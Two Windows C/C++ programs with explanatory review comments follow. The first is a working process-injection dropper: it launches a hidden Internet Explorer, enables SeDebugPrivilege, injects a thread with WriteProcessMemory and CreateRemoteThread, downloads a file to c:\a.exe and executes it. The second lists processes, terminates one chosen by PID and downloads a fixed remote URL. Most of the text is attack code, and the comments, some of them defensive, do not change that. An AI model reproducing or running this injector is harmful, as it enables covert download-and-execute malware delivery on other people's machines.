#include "stdafx.h"
#pragma comment(lib, "urlmon.lib")
#include <tlhelp32.h>
#include <urlmon.h>
#include <shellapi.h>
// Parameter block that WinMain writes into the target process and hands to
// the injected ThreadProc. Url and FilePath are fixed 255-byte buffers filled
// with strcpy (no length check on the source), and DownAd/ExecAd carry
// function addresses as 32-bit DWORDs that the remote side casts back to
// function pointers.
typedef struct _RemotePara
{
char Url[255];
char FilePath[255];
DWORD DownAd;
DWORD ExecAd;
}RemotePara;
// Routine that WinMain copies raw into the target process (a fixed 4096-byte
// WriteProcessMemory starting at &ThreadProc) and starts with
// CreateRemoteThread. It reaches URLDownloadToFileA and WinExec only through
// the addresses carried in lpPara, downloads lpPara->Url to lpPara->FilePath
// and then runs that file (uCmdShow 1 == SW_SHOWNORMAL). Neither the HRESULT
// nor the WinExec result is checked. For a defender the observable chain is
// OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) -> WriteProcessMemory
// -> CreateRemoteThread into a browser process, followed by a file drop and
// execution: a textbook injection / download-and-execute pattern that
// endpoint detection rules key on.
DWORD __stdcall ThreadProc(RemotePara *lpPara)
{
typedef UINT (__stdcall *MWinExec)(LPCSTR lpCmdLine, UINT uCmdShow);
typedef HRESULT (__stdcall *MURLDownloadToFile)(LPUNKNOWN pCaller, LPCTSTR szURL, LPCTSTR szFileName, DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB);
MURLDownloadToFile myURLDownloadToFile;
// Address resolved by GetProcAddress in the injecting process, not here.
myURLDownloadToFile=(MURLDownloadToFile)lpPara->DownAd;
myURLDownloadToFile(0,lpPara->Url,lpPara->FilePath,0,0);
MWinExec myWinExec;
myWinExec=(MWinExec)lpPara->ExecAd;
// Executes whatever was just written to FilePath; return value ignored.
myWinExec(lpPara->FilePath,1);
return 0;
}
// Forward declarations for WinMain; ThreadProc is re-declared although it is
// already defined above.
DWORD FindTarget(LPCTSTR lpszProcess);
void EnableDeBugPriv(void);
DWORD __stdcall ThreadProc(RemotePara *lpPara);
// Entry point of the injector: starts a hidden iexplore.exe, enables
// SeDebugPrivilege, opens that process with full access, copies ThreadProc
// and a RemotePara block into it and runs ThreadProc there via
// CreateRemoteThread. Every failure shows a message box and returns 0; no
// handle opened here (process, thread, the two LoadLibrary modules) is ever
// closed or freed. The remote code relies on urlmon.dll and kernel32.dll
// being mapped at the same addresses in both processes, since the function
// addresses are resolved locally and reused remotely.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// Launches the browser hidden (SW_HIDE) so that a target process exists;
// the result is not checked.
ShellExecute(NULL,"open", "iexplore.exe","","", SW_HIDE );
EnableDeBugPriv();
// FindTarget returns 0 when no iexplore.exe is found; that case is only
// caught indirectly by OpenProcess failing below.
DWORD dwProcessId = FindTarget("iexplore.exe");
// Despite the name this is a process handle, not a window handle.
HANDLE hWnd=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);
if (!hWnd)
{
::MessageBox(NULL,"打开进程错误","错误",0);
return 0;
}
// 4 KiB of read/write/execute memory in the target for the thread body.
void *pRemoteThread= VirtualAllocEx(hWnd, 0,
1024*4, MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (!pRemoteThread)
{
::MessageBox(NULL,"申请内存1错误","错误",0);
return 0;
}
// Copies a fixed 4096 bytes starting at ThreadProc regardless of the
// function's real size, so whatever follows it in this image is copied
// too, and the call fails outright if that range crosses into an
// unreadable page.
if (!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,1024*4,0))
{
::MessageBox(NULL,"写入内存1错误","错误",0);
return 0;
}
RemotePara myRemotePara;
::ZeroMemory(&myRemotePara,sizeof(RemotePara));
// Module handles are never released with FreeLibrary. The (DWORD) casts
// truncate the pointers on a 64-bit build.
HINSTANCE hurlmon=::LoadLibrary("urlmon.dll");
HINSTANCE kernel=::LoadLibrary("kernel32.dll");
myRemotePara.DownAd=(DWORD)::GetProcAddress(hurlmon,"URLDownloadToFileA");
myRemotePara.ExecAd=(DWORD)::GetProcAddress(kernel,"WinExec");
// Placeholder URL (59 'A's); both strcpy calls are unbounded against the
// 255-byte fields.
char urlfile[255];
strcpy(urlfile,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
strcpy(myRemotePara.Url,urlfile);
strcpy(myRemotePara.FilePath,"c:\\a.exe");
// The parameter block holds only data but is also allocated RWX.
RemotePara *pRemotePara=(RemotePara *)::VirtualAllocEx(hWnd,0,sizeof(RemotePara),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (!pRemotePara)
{
::MessageBox(NULL,"申请内存2错误","错误",0);
return 0;
}
if (!::WriteProcessMemory(hWnd,pRemotePara,&myRemotePara,sizeof(myRemotePara),0))
{
::MessageBox(NULL,"写入内存2错误","错误",0);
return 0;
}
// Fixed delay, presumably to let the freshly started browser initialise
// before the remote thread runs — unverified.
Sleep(3000);
// The thread handle is neither waited on nor closed.
HANDLE hThread=::CreateRemoteThread(hWnd,0,0,(LPTHREAD_START_ROUTINE)pRemoteThread,pRemotePara,0,0);
if (!hThread)
{
::MessageBox(NULL,"启动线程错误","错误",0);
return 0;
}
return 0;
}
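// Enables SeDebugPrivilege on the current process token so a later
// OpenProcess can succeed on processes the caller does not own. Failures are
// silent because the function is void. Unlike the original, the token handle
// is closed on every path (it used to leak whenever AdjustTokenPrivileges
// succeeded).
void EnableDeBugPriv(void)
{
    HANDLE hToken = NULL;
    if (!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return;
    LUID sedebugnameValue;
    if (::LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
    {
        TOKEN_PRIVILEGES tkp;
        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Luid = sedebugnameValue;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // AdjustTokenPrivileges returns TRUE even when the privilege is not
        // held by the token (GetLastError() == ERROR_NOT_ALL_ASSIGNED); with a
        // void return there is no way to report that to the caller.
        ::AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL);
    }
    ::CloseHandle(hToken);
}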
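// Returns the process id of the first running process whose image name
// equals lpszProcess (case-insensitive compare), or 0 when no such process
// exists or the snapshot cannot be taken.
DWORD FindTarget(LPCTSTR lpszProcess)
{
    DWORD dwRet = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // Failure is signalled with INVALID_HANDLE_VALUE, not NULL; the original
    // passed that value straight on to Process32First and CloseHandle.
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return 0;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    // Only compare entries that were actually filled in; the original
    // do/while inspected pe32.szExeFile even when Process32First had failed.
    for (BOOL ok = Process32First(hSnapshot, &pe32); ok; ok = Process32Next(hSnapshot, &pe32))
    {
        if (lstrcmpi(pe32.szExeFile, lpszProcess) == 0)
        {
            dwRet = pe32.th32ProcessID;
            break;
        }
    }
    CloseHandle(hSnapshot);
    return dwRet;
}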
------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------
#include "stdio.h"
#include "windows.h"
#include "winbase.h"
#include "tlhelp32.h"
#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment (lib, "urlmon.lib")
//提升本进程权限
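// Enables SeShutdownPrivilege on the current process token — not
// SeDebugPrivilege, despite the name. That is the privilege ExitWindowsEx
// needs (see the commented-out call in main) and is unrelated to the
// PROCESS_TERMINATE access pskill asks for. Every API result is now checked,
// so a failed OpenProcessToken no longer ends in CloseHandle on an
// uninitialised handle.
void EnableDebugPriv( void )
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return;
    TOKEN_PRIVILEGES tkp;
    if (LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid))
    {
        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // Returns TRUE even when the privilege is absent from the token
        // (GetLastError() == ERROR_NOT_ALL_ASSIGNED); the function is void,
        // so the caller is not told either way.
        AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0);
    }
    CloseHandle(hToken);
}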
//文件下载
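// Downloads sURL to the local path sDest and returns 0 on S_OK, 1 otherwise.
// The original literal "e:\a.jpg" contained the escape \a (BEL, 0x07), so the
// file was written to "e:<BEL>a.jpg"; the default now spells the backslash.
// The transfer is plain HTTP and nothing verifies what arrives.
int DownloadFile(char *sURL, const char *sDest = "e:\\a.jpg")
{
    HRESULT hr = URLDownloadToFile(0, sURL, sDest, 0, 0);
    return (hr == S_OK) ? 0 : 1;
}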
//取得系统版本
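// Returns 1 when the platform is NT-based and 0 otherwise. A failed
// GetVersionEx also yields 0; the original read an uninitialised
// dwPlatformId in that case. GetVersionEx is deprecated in current SDKs;
// VerifyVersionInfo / the version-helper functions are the supported path.
int GetOsVer(void)
{
    OSVERSIONINFO winfo;
    ZeroMemory(&winfo, sizeof(winfo));
    winfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if (!GetVersionEx(&winfo))
        return 0;
    return (winfo.dwPlatformId == VER_PLATFORM_WIN32_NT) ? 1 : 0;
}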
//根据进程ID杀进程
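// Terminates the process with the given id. Returns 0 on success and -1 if
// the process cannot be opened or terminated (the Win32 error is printed).
// The original had no return type, called TerminateProcess on a NULL handle
// before OpenProcess, never closed the handle and returned -1 on every path.
int pskill(int id)
{
    HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, (DWORD)id);
    if (hProcess == NULL)
    {
        printf("\nOpen Process fAiled:%d\n", GetLastError());
        return -1;
    }
    int rc = 0;
    if (!TerminateProcess(hProcess, 0))
    {
        printf("%d", GetLastError());
        rc = -1;
    }
    CloseHandle(hProcess);
    return rc;
}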
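// Prints the OS family, lists running processes, asks for a PID to
// terminate, then downloads a fixed URL. Always returns 0; the download
// result is only printed.
int main(void)
{
    // Array instead of char* so the literal is not bound to a non-const pointer.
    char sURL[] = "http://www.jxbiz.com/shop.asp";
    int id = 0;
    HANDLE hSnApshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (GetOsVer())
        printf("Your system is winnt!\n");
    else
        printf("Your system is win98!\n");
    // Process enumeration.
    if (hSnApshot != INVALID_HANDLE_VALUE)
    {
        PROCESSENTRY32 te = {sizeof(te)};
        for (BOOL f0k = Process32First(hSnApshot, &te); f0k; f0k = Process32Next(hSnApshot, &te))
            printf("Pid: %d %s\n", te.th32ProcessID, te.szExeFile);
        // The original closed the handle unconditionally, i.e. also when it
        // was INVALID_HANDLE_VALUE.
        CloseHandle(hSnApshot);
    }
    // Kill the chosen process. scanf leaves id untouched on malformed input,
    // so the kill is skipped unless a number was actually read.
    printf("the process's id which you want to kill:");
    if (scanf("%d", &id) == 1)
    {
        EnableDebugPriv(); // enables SeShutdownPrivilege, see EnableDebugPriv
        pskill(id);
    }
    // Download the file.
    if (DownloadFile(sURL) == 0)
        printf("down successful!\n");
    else
        printf("error!\n");
    //EnableDebugPriv();
    //ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE, 0);
    return 0;
}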